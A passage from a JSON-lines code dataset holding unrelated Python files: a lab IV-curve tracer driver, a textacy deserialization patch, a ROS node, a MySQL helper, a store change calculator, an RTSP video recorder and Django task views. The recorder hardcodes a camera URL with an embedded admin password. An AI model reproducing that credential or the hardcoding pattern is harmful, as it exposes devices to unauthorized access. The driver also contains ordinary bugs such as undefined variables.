NotImplementedError\n\n def get_amplitude(self):\n raise NotImplementedError\n\n def set_amplitude(self, value):\n raise NotImplementedError\n\n def list_tcs(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_tc(self):\n raise NotImplementedError\n\n def set_tc(self, value):\n raise NotImplementedError\n\n def get_frequency(self):\n raise NotImplementedError\n\n def set_frequency(self, value):\n raise NotImplementedError\n\n def read_value(self):\n \"\"\"Read a complex value from the lock-in.\n\n This method should not wait before taking a measurement.\n\n 
The framework ensures a proper wait time.\n\n \"\"\"\n raise NotImplementedError\n\n\nclass Driver(InstrumentDriver.InstrumentWorker):\n \"\"\"This class implements the VICurveTracer driver.\n\n This assumes that the source will trigger the meter when starting a ramp.\n\n Using the Yoko GS200 and the Keithley 6500 we can expect the bias current\n to be offset by 1-3% of the max value.\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._source: BiasGenerator = None\n self._meter1: VoltMeter = None\n self._meter2: VoltMeter = None\n self._li1: LockIn = None\n self._li2: LockIn = None\n self._lock = RLock()\n # In Point by point (with Lock-in) this is used to store the LI trace\n # acquired at the same time as the IV.\n self._bias = None\n self._IV_curve2 = None\n self._realbias1 = None\n self._realbias2 = None\n self._didv_trace1 = None\n self._didv_trace2 = None\n self._li_trace1 = None\n self._li_trace2 = None\n # Padding points help overcome issues with respect of the ramp by the\n # source\n self._padding_points = 0\n\n def performOpen(self, options={}):\n \"\"\"Perform the operation of opening the instrument connection.\"\"\"\n super().performOpen(options)\n with self._lock:\n # Get the acquisition mode\n acq_mode = self.getValue(\"Acquisition mode\")\n\n # Start the source\n s_model = self.getValue(\"Source: Model\")\n s_add = self.getValue(\"Source: VISA address\")\n cls = importlib.import_module(s_model).Driver\n self._source = cls(s_add)\n if (\n not self._source.support_continuous_sweeping()\n and acq_mode == \"Continuous\"\n ):\n acq_mode = self.setValue(\n \"Acquisition mode\", \"Point by point (without Lock-in)\"\n )\n\n # Start the meter\n m1_model = self.getValue(\"DMM1: Model\")\n m1_add = self.getValue(\"DMM1: VISA address\")\n cls = importlib.import_module(m1_model).Driver\n self._meter1 = cls(m1_add)\n\n m2_model = self.getValue(\"DMM2: Model\")\n m2_add = self.getValue(\"DMM2: VISA address\")\n cls = importlib.import_module(m2_model).Driver\n self._meter2 = cls(m2_add)\n\n # Start the lock-in\n li1_model = self.getValue(\"Lock-In1: Model\")\n li1_add = self.getValue(\"Lock-In1: VISA address\")\n if acq_mode == \"Point by point (with Lock-in)\":\n if li1_model and li1_add:\n cls = importlib.import_module(li1_model).Driver\n self._li1 = cls(li1_add)\n\n li2_model = self.getValue(\"Lock-In2: Model\")\n li2_add = self.getValue(\"Lock-In2: VISA address\")\n if acq_mode == \"Point by point (with Lock-in)\":\n if li2_model and li2_add:\n cls = importlib.import_module(li2_model).Driver\n self._li2 = cls(li2_add)\n\n else:\n raise RuntimeError(\n \"No valid information for Lock-in even though the mode \"\n \"requires a lock-in. Missing:\\n\"\n + (\"- Address\\n\" if not li_add else \"\")\n + (\"- Model\" if not li_model else \"\")\n )\n else:\n self._li1 = None\n self._li2 = None\n\n # Start the voltage lock-in\n # li_model = self.getValue(\"Lock-In: Model\")\n # li_add = self.getValue(\"Lock-In: VISA address\")\n # if acq_mode == \"Point by point (with Lock-in)\":\n # if li_model and li_add:\n # cls = importlib.import_module(li_model).Driver\n # self._li = cls(li_add)\n # else:\n # raise RuntimeError(\n # \"No valid information for Lock-in even though the mode \"\n # \"requires a lock-in. 
Missing:\\n\"\n # + (\"- Address\\n\" if not li_add else \"\")\n # + (\"- Model\" if not li_model else \"\")\n # )\n # else:\n # self._li = None\n\n self._change_meter_acquisition_mode(acq_mode)\n if acq_mode == \"Continuous\":\n ext = self.getValue(\"Source: extrema\")\n re_rate = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n ac_rate = self.readValueFromOther(\"DMM: acquisition rate\")\n\n # Center the points in the window of acquisition and add padding\n self._prepare_ramp(ext, points, ac_rate, re_rate)\n\n def performClose(self, bError=False, options={}):\n \"\"\"Perform the close instrument connection operation.\"\"\"\n self._source.close()\n self._meter1.close()\n self._meter2.close()\n if self._li1 and self._li2:\n self._li1.close()\n self._li2.close()\n # if self._li:\n # self._li.close()\n\n def performSetValue(self, quant, value, sweepRate=0.0, options={}):\n \"\"\"Perform the Set Value instrument operation.\n\n This function should return the actual value set by the instrument\n\n \"\"\"\n q_name = quant.name\n update_ramps = False\n ext = points = ac_rate = re_rate = None\n\n if q_name in (\n \"Source: VISA address\",\n \"DMM1: VISA address\",\n \"DMM2: VISA address\",\n \"Lock-In1: VISA address\",\n \"Lock-In2: VISA address\",\n \"Source: Model\",\n \"DMM1: Model\",\n \"DMM2: Model\",\n \"Lock-In1: Model\",\n \"Lock-In2: Model\",\n \"DC Voltage divider\",\n \"AC Voltage divider\",\n \"Trans-impedance amplifier: gain\",\n \"Inline resistance 1\",\n \"Inline resistance 2\",\n \"Inline resistance 3\",\n \"Bias offset\",\n \"DMM: averaging time Lock-in\",\n ):\n pass\n\n elif q_name == \"Acquisition mode\":\n if value == \"Point by point (with Lock-in)\":\n li1_model = self.getValue(\"Lock-In1: Model\")\n li1_add = self.getValue(\"Lock-In1: VISA address\")\n if li1_model and li1_add:\n cls = importlib.import_module(li1_model).Driver\n self._li1 = cls(li1_add)\n\n li2_model = self.getValue(\"Lock-In2: Model\")\n li2_add = self.getValue(\"Lock-In2: VISA address\")\n if li2_model and li2_add:\n cls = importlib.import_module(li2_model).Driver\n self._li2 = cls(li2_add)\n\n\n else:\n raise RuntimeError(\n \"No valid information for Lock-in even though the mode \"\n \"requires a lock-in. Missing:\\n\"\n + (\"- Address\\n\" if not li_add else \"\")\n + (\"- Model\" if not li_model else \"\")\n )\n # elif value == \"Point by point (with 2 Lock-in)\":\n # li_model = self.getValue(\"Lock-In: Model\")\n # li_add = self.getValue(\"Lock-In: VISA address\")\n # if li_model and li_add:\n # cls = importlib.import_module(li_model).Driver\n # self._li = cls(li_add)\n # else:\n # raise RuntimeError(\n # \"No valid information for Lock-in even though the mode \"\n # \"requires a lock-in. Missing:\\n\"\n # + (\"- Address\\n\" if not li_add else \"\")\n # + (\"- Model\" if not li_model else \"\")\n # )\n # li_model = self.getValue(\"Lock-In: Model\")\n # li_add = self.getValue(\"Lock-In: VISA address\")\n # if li_model and li_add:\n # cls = importlib.import_module(li_model).Driver\n # self._li = cls(li_add)\n # else:\n # raise RuntimeError(\n # \"No valid information for Lock-in even though the mode \"\n # \"requires a lock-in. 
Missing:\\n\"\n # + (\"- Address\\n\" if not li_add else \"\")\n # + (\"- Model\" if not li_model else \"\")\n # )\n elif self._li1 and self._li2:\n self._li1.close()\n self._li2.close()\n if value == \"Continuous\" and not self._source.support_continuous_sweeping():\n raise ValueError(\n \"The selected source does not support continuous sweeps\"\n )\n self._change_meter_acquisition_mode(value)\n elif q_name == \"Source: range\":\n with self._lock:\n self._source.set_range(value)\n elif q_name == \"Source: extrema\":\n update_ramps = True\n ext = value\n elif q_name == \"Source: reset rate\":\n update_ramps = True\n re_rate = value\n elif q_name == \"DMM: range\":\n with self._lock:\n self._meter1.set_range(value)\n self._meter2.set_range(value)\n elif q_name == \"Number of points\":\n update_ramps = True\n points = int(value)\n elif q_name == \"DMM: acquisition rate\":\n update_ramps = True\n ac_rate = value\n elif q_name == \"DMM: averaging time\":\n with self._lock:\n self._meter1.set_averaging_time(value)\n self._meter2.set_averaging_time(value)\n elif q_name == \"Lock-in: frequency\":\n with self._lock:\n self._li1.set_frequency(value)\n self._li2.set_frequency(value)\n # XXX deal with LI voltage\n elif q_name == \"Lock-in: amplitude\":\n with self._lock:\n self._li1.set_amplitude(value)\n self._li2.set_amplitude(value)\n # XXX deal with LI voltage\n elif q_name == \"Lock-in: time constant\":\n with self._lock:\n self._li1.set_tc(value)\n self._li2.set_tc(value)\n self._meter1.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n self._meter2.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n # XXX deal with LI voltage\n elif q_name == \"Lock-in: settling time\":\n with self._lock:\n self._meter1.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n self._meter2.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n\n if self.getValue(\"Acquisition mode\") == \"Continuous\" and update_ramps:\n ext = ext or self.getValue(\"Source: extrema\")\n re_rate = re_rate or self.getValue(\"Source: reset rate\")\n points = points or self.getValue(\"Number of points\")\n ac_rate = ac_rate or self.getValue(\"DMM: acquisition rate\")\n # Center the points in the window of acquisition and add padding\n self._prepare_ramp(ext, points, ac_rate, re_rate)\n\n return value\n\n def performGetValue(self, quant, options={}):\n \"\"\"Perform the Get Value instrument operation.\"\"\"\n q_name = quant.name\n\n if q_name == \"IV curve 1\":\n acq_mode = self.getValue(\"Acquisition mode\")\n ext = self.getValue(\"Source: extrema\")\n points = self.getValue(\"Number of points\")\n offset = self.getValue(\"Bias offset\")\n with self._lock:\n if acq_mode == \"Continuous\":\n data = self._perform_continuous_acquisition()\n else:\n data = self._perform_point_by_point_acquisition(\n \"without\" not in acq_mode\n )\n bias = (np.linspace(-ext, ext, points) / self.getValue(\"DC Voltage divider\"))\n self._bias = bias\n\n return quant.getTraceDict(\n data,\n x=bias,\n )\n\n if q_name == \"IV curve 2\":\n return quant.getTraceDict(\n self._IV_curve2,\n x=self._bias,\n )\n\n if q_name == \"dIdV vs V curve 1\":\n return quant.getTraceDict(\n self._li_trace1, x=self._bias\n )\n\n if q_name == \"dIdV vs V curve 2\":\n return quant.getTraceDict(\n self._li_trace2, x=self._bias\n )\n\n if q_name == \"dsigma vs V curve 1\":\n return quant.getTraceDict(\n self._didv_trace1, x=self._bias\n )\n\n if q_name == \"dsigma vs V curve 2\":\n return 
quant.getTraceDict(\n                self._didv_trace2, x=self._bias\n            )\n\n        if q_name == \"Real voltagebias 1\":\n            return quant.getTraceDict(\n                self._realbias1, x=self._bias\n            )\n\n        if q_name == \"Real voltagebias 2\":\n            return quant.getTraceDict(\n                self._realbias2, x=self._bias\n            )\n\n        # For quantities corresponding to software only parameters simply\n        # return the value\n        elif q_name in (\n            \"Acquisition mode\",\n            \"Source: Model\",\n            \"Source: VISA address\",\n            \"DMM1: Model\",\n            \"DMM1: VISA address\",\n            \"DMM2: Model\",\n            \"DMM2: VISA address\",\n            \"Lock-In1: Model\",\n            \"Lock-In1: VISA address\",\n            \"Lock-In2: Model\",\n            \"Lock-In2: VISA address\",\n            # XXX duplicate Li voltage entries\n            \"Source: extrema\",\n            \"Source: reset rate\",\n            \"Number of points\",\n            \"DC Voltage divider\",\n            \"AC Voltage divider\",\n            \"Trans-impedance amplifier: gain\",\n            \"Inline resistance 1\",\n            \"Inline resistance 2\",\n            \"Inline resistance 3\",\n            \"Bias offset\",\n            \"DMM: averaging time Lock-in\",\n        ):\n            return quant.getValue()\n\n        elif q_name == \"Source: list ranges\":\n            with self._lock:\n                return self._source.list_ranges()\n\n        elif q_name == \"Source: range\":\n            with self._lock:\n                return self._source.get_range()\n\n        elif q_name == \"DMM: list ranges\":\n            with self._lock:\n                return self._meter1.list_ranges()\n\n        elif q_name == \"DMM: range\":\n            with self._lock:\n                return self._meter1.get_range()\n\n        elif q_name == \"DMM: list acquisition rates\":\n            with self._lock:\n                return self._meter1.list_acquisition_rates()\n\n        elif q_name == \"DMM: acquisition rate\":\n            with self._lock:\n                return 
leading to the\n # smallest error\n padding = possible_pads[np.argmin(times % res[\"time\"])]\n else:\n raise ValueError(\"Unsupported resolution format\")\n self._padding_points = padding\n\n # Center the points in the window of acquisition\n val = self.ramp_extrema(ext, points, padding)\n\n self._source.select_range(val, self.getValue(\"Source: load resistance\"))\n\n self._source.prepare_ramps(\n [\n (-val, val, self.ramp_speed(val, points + 2 * padding, data_rate)),\n (\n val,\n -val,\n self._source.get_admissible_reset_rate(reset_rate, 2 * val),\n ),\n ]\n )\n self._meter.prepare_acquisition(points + 2 * padding)\n\n def _change_meter_acquisition_mode(self, mode):\n \"\"\"Change the meter configuation based on the acquisition mode.\"\"\"\n if \"Point by point\" in mode:\n self._meter1.set_acquisition_mode(\"point by point\")\n self._meter2.set_acquisition_mode(\"point by point\")\n if \"without\" not in mode:\n self._meter1.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n self._meter2.set_averaging_time(\n self.getValue(\"DMM: averaging time Lock-in\")\n )\n else:\n if \"without\" in mode:\n self._meter1.set_averaging_time(self.getValue(\"DMM: averaging time\"))\n self._meter2.set_averaging_time(self.getValue(\"DMM: averaging time\"))\n else:\n ext = self.getValue(\"Source: extrema\")\n re_rate = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n ac_rate = self.getValue(\"DMM: acquisition rate\")\n self._meter.set_acquisition_mode(\"continuous\")\n self._meter.set_acquisition_rate(ac_rate)\n self._prepare_ramp(ext, points, ac_rate, re_rate)\n\n def _perform_continuous_acquisition(self):\n \"\"\"Perform a continuous acquisition.\"\"\"\n ext = self.getValue(\"Source: extrema\")\n reset = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n # Center the points in the window of acquisition\n init = self.ramp_extrema(ext, points, self._padding_points)\n\n # Should only happen on the first scan since we reset the value after\n # setting\n while self._source.is_ramping():\n sleep(0.01)\n curr = self._source.current_value()\n logger.critical(f\"{curr}\")\n if curr != -init:\n self._source.goto_value(-init, reset)\n while self._source.is_ramping():\n sleep(0.01)\n\n # The DMM is preconfigured for the right number of points, so simply arm\n self._meter.arm_device()\n\n # Start the ramp.\n self._source.start_ramp(0)\n sleep(0.1)\n\n # Wait for the data\n self._meter.wait_for_data_ready()\n while self._source.is_ramping():\n sleep(0.01)\n\n # Retrieve the data\n data = self._meter.retrieve_data()\n # Remove padding\n data = data[self._padding_points : -self._padding_points]\n\n # Reset the source so that it has time to reset\n self._source.start_ramp(1)\n\n return data\n\n def _perform_point_by_point_acquisition(self, with_li: bool):\n \"\"\"Perform a point by point acquisition.\"\"\"\n ext = self.getValue(\"Source: extrema\")\n reset = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n offset = self.getValue(\"Bias offset\")\n #both_li = with_li and \"2\" in self.getValue(\"Acquisition mode\")\n\n set_points = np.linspace(-ext + offset * self.getValue(\"DC Voltage divider\"),\n ext + offset * self.getValue(\"DC Voltage divider\"), points)\n dmm_vals1 = np.empty_like(set_points)\n dmm_vals2 = np.empty_like(set_points)\n if with_li:\n li_vals1 = np.empty_like(set_points, dtype=complex)\n li_vals2 = np.empty_like(set_points, dtype=complex)\n # XXX create storage for LI 
2 value\n        t = self.getValue(\"Lock-in: settling time\") * self.getValue(\n            \"Lock-in: time constant\"\n        )\n        source = self._source\n        dmm1 = self._meter1\n        dmm2 = self._meter2\n        li1 = self._li1\n        li2 = self._li2\n        # XXX get LI\n\n        # Ensure we are using the proper range\n        self._source.select_range(\n            # 10 resistance to ground of the divider\n            ext + abs(offset) * self.getValue(\"DC Voltage divider\"),\n            10 * self.getValue(\"DC Voltage divider\")\n        )\n\n        # Should only happen on the first scan since we reset the value after\n        # setting\n        while self._source.is_ramping():\n            sleep(3)\n        # Go to the first point and wait\n        source.goto_value(set_points[0], reset)\n        while source.is_ramping():\n            sleep(3)\n\n        for i, v in enumerate(set_points):\n            source.goto_value(v, reset)\n            sleep(t)\n            dmm_vals1[i] = dmm1.read_value()\n            dmm_vals2[i] = dmm2.read_value()\n            if with_li:\n                li_vals1[i] = li1.read_value()\n                li_vals2[i] = li2.read_value()\n            # if both_li:\n                # XXX get LI 2 value\n\n        # Go to the first point and wait\n        source.goto_value(set_points[0], reset)\n\n        # Convert to current\n        dmm_vals1 /= self.getValue(\"Trans-impedance amplifier: gain\")\n        dmm_vals2 /= self.getValue(\"Trans-impedance amplifier: gain\")\n\n        if with_li:\n            self._li_trace1 = li_vals1\n            self._li_trace2 = li_vals2\n            # Convert AC measurement to conductance\n            sigma1 = ( abs(li_vals1)\n                / self.getValue(\"Trans-impedance amplifier: gain\")\n                / (\n                    self.getValue(\"Lock-in: amplitude\")\n                    / self.getValue(\"AC Voltage divider\")\n                )\n            )\n            self._didv_trace1 = (\n                sigma1\n                / (2 * cs.e ** 2 / cs.h)\n                / (1 - sigma1 * self.getValue(\"Inline resistance\"))\n            )\n            self._realbias1 = (set_points / self.getValue(\"DC Voltage divider\")\n                - offset\n                - dmm_vals1 * self.getValue(\"Inline resistance\")\n            )\n            self._realbias2 = (set_points / self.getValue(\"DC Voltage divider\")\n                - offset\n                - dmm_vals2 * self.getValue(\"Inline resistance\")\n            )\n            # Conversion for both li\n        self._IV_curve2 = dmm_vals2\n        return dmm_vals1\n\n\nif __name__ == \"__main__\":\n    pass\n","sub_path":"3TIVTracer/Save/IVtracer2.py","file_name":"IVtracer2.py","file_ext":"py","file_size_in_byte":28128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"491436785","text":"# -*- coding: utf-8 -*-\nimport msgpack\nimport spacy\nimport textacy\n\nfrom spacy.language import Language as SpacyLang\nfrom spacy.tokens.doc import Doc as SpacyDoc\n\nfrom textacy import cache\nfrom textacy import compat\nfrom textacy.io.utils import open_sesame\nfrom pympler import asizeof\nimport humanfriendly\nimport os\nimport psutil\n\n# NOTE: The following code has been adapted from textacy.io.spacy.read_spacy_docs\n# The only modification is addition of arg encoding='utf8' to Unpacker()\n \ndef read_spacy_docs(fname, format=\"pickle\", lang=None):\n    \"\"\"\n    Read the contents of a file at ``fname``, written either in pickle or binary\n    format.\n    Args:\n        fname (str): Path to file on disk from which data will be read.\n        format ({\"pickle\", \"binary\"}): Format of the data that was written to disk.\n            If 'pickle', use ``pickle`` in python's stdlib; if 'binary', use\n            the 3rd-party ``msgpack`` library.\n            .. warning:: Docs written in pickle format were saved all together\n               as a list, which means they're all loaded into memory at once\n               before streaming one by one. Mind your RAM usage, especially when\n               reading many docs!\n            .. warning:: When writing docs in binary format, spaCy's built-in\n               ``spacy.Doc.to_bytes()`` method is used, but when reading the data\n               back in :func:`read_spacy_docs()`, experimental and *unofficial*\n               work-arounds are used to allow for all the docs in ``data`` to be\n               read from the same file. If spaCy changes, this code could break,\n               so use this functionality at your own risk!\n        lang (str or ``spacy.Language``): Already-instantiated ``spacy.Language``\n            object, or the string name by which it can be loaded, used to process\n            the docs written to disk at ``fname``. Note that this is only applicable\n            when ``format=\"binary\"``.\n    Yields:\n        ``spacy.Doc``: Next deserialized document.\n    Raises:\n        ValueError: if format is not \"pickle\" or \"binary\", or if ``lang`` is not\n            provided when ``format=\"binary\"``\n    \"\"\"\n    if format == \"pickle\":\n        with open_sesame(fname, mode='rb') as f:\n            for spacy_doc in compat.pickle.load(f):\n                yield spacy_doc\n    elif format == \"binary\":\n        if lang is None:\n            raise ValueError(\n                \"When format='binary', a `spacy.Language` (and its associated \"\n                \"`spacy.Vocab`) is required to deserialize the binary data; \"\n                \"and these should be the same as were used when processing \"\n                \"the original docs!\")\n        elif isinstance(lang, SpacyLang):\n            vocab = lang.vocab\n        elif isinstance(lang, compat.unicode_):\n            vocab = cache.load_spacy(lang).vocab\n        else:\n            raise ValueError(\n                \"lang = '{}' is invalid; must be a str or `spacy.Language`\".format(lang))\n        with open_sesame(fname, mode='rb') as f:\n\n            unpacker = msgpack.Unpacker(f, encoding='UTF-8')\n            \n            for msg in unpacker:\n\n                # NOTE: The following code has been adapted from spaCy's\n                # built-in ``spacy.Doc.from_bytes()``. If that functionality\n                # changes, the following will probably break...\n\n                # Msgpack doesn't distinguish between lists and tuples, which is\n                # vexing for user data. As a best guess, we *know* that within\n                # keys, we must have tuples. 
In values we just have to hope\n                # users don't mind getting a list instead of a tuple.\n                if \"user_data_keys\" in msg:\n                    \n                    user_data_keys = msgpack.loads(msg[\"user_data_keys\"], use_list=False, encoding='utf-8')\n                    for encoding in ['utf-8', 'latin1']:\n                        try:\n                            user_data_values = msgpack.loads(msg[\"user_data_values\"], encoding=encoding)\n                        except:\n                            if encoding == 'latin1': raise\n                        else:\n                            # stop at the first encoding that decodes successfully\n                            break\n                        \n                    user_data = {\n                        key: value\n                        for key, value in compat.zip_(user_data_keys, user_data_values)}\n                else:\n                    user_data = None\n                \n                text = msg[\"text\"]\n                attrs = msg[\"array_body\"]\n                words = []\n                spaces = []\n                start = 0\n                for i in compat.range_(attrs.shape[0]):\n                    end = start + int(attrs[i, 0])\n                    has_space = int(attrs[i, 1])\n                    words.append(text[start: end])\n                    spaces.append(bool(has_space))\n                    start = end + has_space\n\n                spacy_doc = SpacyDoc(vocab, words=words, spaces=spaces, user_data=user_data)\n                spacy_doc = spacy_doc.from_array(msg[\"array_head\"][2:], attrs[:, 2:])\n                if \"sentiment\" in msg:\n                    spacy_doc.sentiment = msg[\"sentiment\"]\n                if \"tensor\" in msg:\n                    spacy_doc.tensor = msg[\"tensor\"]\n\n                yield spacy_doc\n    else:\n        raise ValueError(\n            \"format = '{}' is invalid; value must be one of {}\".format(\n                format, {\"pickle\", \"binary\"}))\n        \n        \n        ","sub_path":"src/3_text_analysis/textacy_patch.py","file_name":"textacy_patch.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"260698696","text":"from docx import Document\r\nfrom openpyxl import Workbook\r\n\r\nwb = Workbook()\r\nws = wb.active\r\n\r\ndocument = Document(\"論文.docx\")\r\nparagraphs = document.paragraphs\r\n\r\nheading1_style = 'Heading 1'\r\n\r\ncount = 0\r\nfor paragraph in paragraphs:\r\n if paragraph.style.name == heading1_style:\r\n count += 1\r\n ws.cell(count, 1).value = paragraph.text\r\nwb.save(\"論文見出し.xlsx\")\r\n","sub_path":"word/read_style.py","file_name":"read_style.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"75048266","text":"#! /usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import String\n\ndef run_node():\n rospy.init_node('talker_python')\n talk_pub = rospy.Publisher('important_message', String, queue_size=100)\n \n rate = rospy.Rate(2)\n \n count = 0\n while not rospy.is_shutdown():\n if count % 2 == 0:\n msg = 'count is : ' + str(int(count/2))\n else:\n msg = 'count is : ' + str(int(count/2)) + \" and a half\"\n count = count + 1\n \n talk_pub.publish(msg)\n rate.sleep()\n\nif __name__ == \"__main__\":\n try:\n run_node()\n except rospy.ROSInterruptException:\n pass","sub_path":"talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"276670746","text":"\nimport MySQLdb as mdb\nfrom parseConfig import parseconfig\n\nconfig = parseconfig('my.conf','mysqld')\nconn = mdb.connect(\n host=config['host'],\n user=config['user'], \n passwd=config['password'],\n db=config['db'],\n charset=config['charset'])\n\ncursor = conn.cursor()\n\nconn.autocommit(1)\n\n\ndef execute_sql(sql):\n return cursor.execute(sql)\n\ndef select_all_result(sql):\n cursor.execute(sql)\n return cursor.fetchall()\n\ndef select_one_result(sql):\n cursor.execute(sql)\n return cursor.fetchone()\n\ndef close_db():\n cursor.close()\n conn.close()\n","sub_path":"lesson9/fengxiaoli/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"582014689","text":"class Store(object):\n    \"\"\"docstring for Store.\"\"\"\n\n    def __init__(self, n):\n        super(Store, self).__init__()\n        # per-instance list (a class attribute would be shared by all stores)\n        self.data = []\n        for i in range(n):\n            print('Producto', i+1)\n            c = float(input('Cantidad: '))\n            p = float(input('Precio: '))\n            self.data.append(c*p)\n\n    def total(self):\n        result = 0\n        for i in range(len(self.data)):\n            result = self.data[i]+result\n        return result\n\n    def cambio(self):\n        billetes_y_monedas = [500, 200, 100, 50, 20, 10, 5, 2, 1, 0.50, 0.20, 0.10, 0.01]\n        monedero = []\n        dato = self.total()\n        # split the total into its integer part and its cents; indexing a\n        # float (dato[1]) raised TypeError, so the old try/except always\n        # left parte_decimal at 0.0\n        parte_entera = int(dato)\n        parte_decimal = round(dato - parte_entera, 2)\n\n        for i in billetes_y_monedas:\n            unidades, resto = divmod(parte_entera, i)\n            if unidades != 0:\n                monedero.append((i, unidades))\n            parte_entera = resto\n\n        if parte_decimal > 0:\n            for i in billetes_y_monedas:\n                unidades, resto = divmod(parte_decimal, i)\n                if unidades != 0:\n                    monedero.append((i,unidades))\n                parte_decimal = round(resto,2)\n\n        cadena = ''\n        for i in monedero:\n            if i[0] >= 5: cadena += '%d billete/s de %d' % (i[1],i[0])\n            if i[0] < 5: cadena += '%d moneda/s de %s' % (i[1],i[0])\n            cadena += '\\n'\n        return cadena\nn = int(input('Numero de productos diferentes: '))\ns = Store(n)\nprint('Cambio\\n', s.cambio())\n","sub_path":"second/first/examen3.py","file_name":"examen3.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"617349273","text":"# coding=utf-8\n\"\"\"Performs face detection in realtime.\n\nBased on code from https://github.com/shanren7/real_time_face_recognition\n\"\"\"\n# MIT License\n#\n# Copyright (c) 2017 François Gervais\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport argparse\nimport sys\nimport time\nimport cv2\nimport os\nimport shutil\nimport mysql.connector\nfrom scipy import misc\n\n# Initial date and time\nnow_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))\nnow_hour = time.strftime('%H', time.localtime(time.time()))\n\nVIDEO_STREAM = \"rtsp://admin:ddd123456@10.245.135.26:554\"\nIMGS_DIR = './videos/'\nMY_COLOR = (0, 255, 0)\n\ndef main(args):\n\n    frame_interval = 4  # Number of frames after which to run face detection\n    fps_display_interval = 10  # seconds\n    frame_rate = 25\n    frame_count = 0\n\n    # Open the latest live video stream\n    video_capture = cv2.VideoCapture(VIDEO_STREAM)\n    # Define the recording video codec (DIVX fourcc)\n    sp_typ = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')\n    #sp_typ = cv2.VideoWriter_fourcc('','','','')\n    now_second = time.strftime('%M%s', time.localtime(time.time()))\n    out = cv2.VideoWriter('save_video/'+now_date+now_hour+now_second+'.avi', sp_typ, 25.0, (2560, 1440))\n    while True:\n        # Capture frame-by-frame\n        ret, frame = video_capture.read()\n        # cv2.imwrite('save_video/'+now_date+now_second+'.jpg',frame)\n        out.write(frame)\n        #cv2.imshow('video',frame)\n        frame_count += 1\n        if cv2.waitKey(1) & 0xFF == ord('q'): \n            break \n\n\n\ndef parse_arguments(argv):\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('--debug', action='store_true',\n                        help='Enable some debug outputs.')\n    parser.add_argument('--image', action='store_true',\n                        help='Process images instead of video.')\n    return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n    main(parse_arguments(sys.argv[1:]))\n","sub_path":"video_saver.py","file_name":"video_saver.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"214860271","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import viewsets\nfrom rest_framework import permissions\nimport schedule\nimport time\nimport xlwt\nimport datetime\nfrom django.utils.html import strip_tags\nfrom django.http import HttpResponse\nfrom rest_framework.generics import (CreateAPIView, DestroyAPIView,\n                                     ListAPIView, RetrieveAPIView,\n                                     RetrieveUpdateAPIView)\nfrom taskapp.models import Role,Employee,Task, Comments\nfrom taskapp.serializers import TaskSerializer, CommentsSerializer\nfrom employeetask import settings\n\nclass TaskCreateView(CreateAPIView):\n\n    serializer_class = TaskSerializer\n\n    def perform_create(self, serializer):\n        try:\n            self.id = self.kwargs.get('id')\n            employee_obj = Employee.objects.get(id=self.id)\n            serializer.save(employee=employee_obj,created_by=employee_obj.email,updated_by=employee_obj.email)\n        except Exception as e:\n            print(e)\n\nclass TaskListView(ListAPIView):\n\n    serializer_class = TaskSerializer\n\n    def get_queryset(self, *args, **kwargs):\n        self.id = self.kwargs.get(\"id\")\n        try:\n            employee = Employee.objects.get(id=self.id)\n            query_set = Task.objects.filter(employee = employee)\n            return query_set\n        except Exception as e:\n            print(e)\n\nclass EmployeeTaskRolewiseListView(ListAPIView):\n\n    serializer_class = TaskSerializer\n\n    def get_queryset(self, *args, **kwargs):\n        self.role = self.kwargs.get(\"role\")\n        try:\n            role=Role.objects.get(name=self.role)\n            employees = Employee.objects.filter(role = role)\n            # filter over all employees with this role at once; the 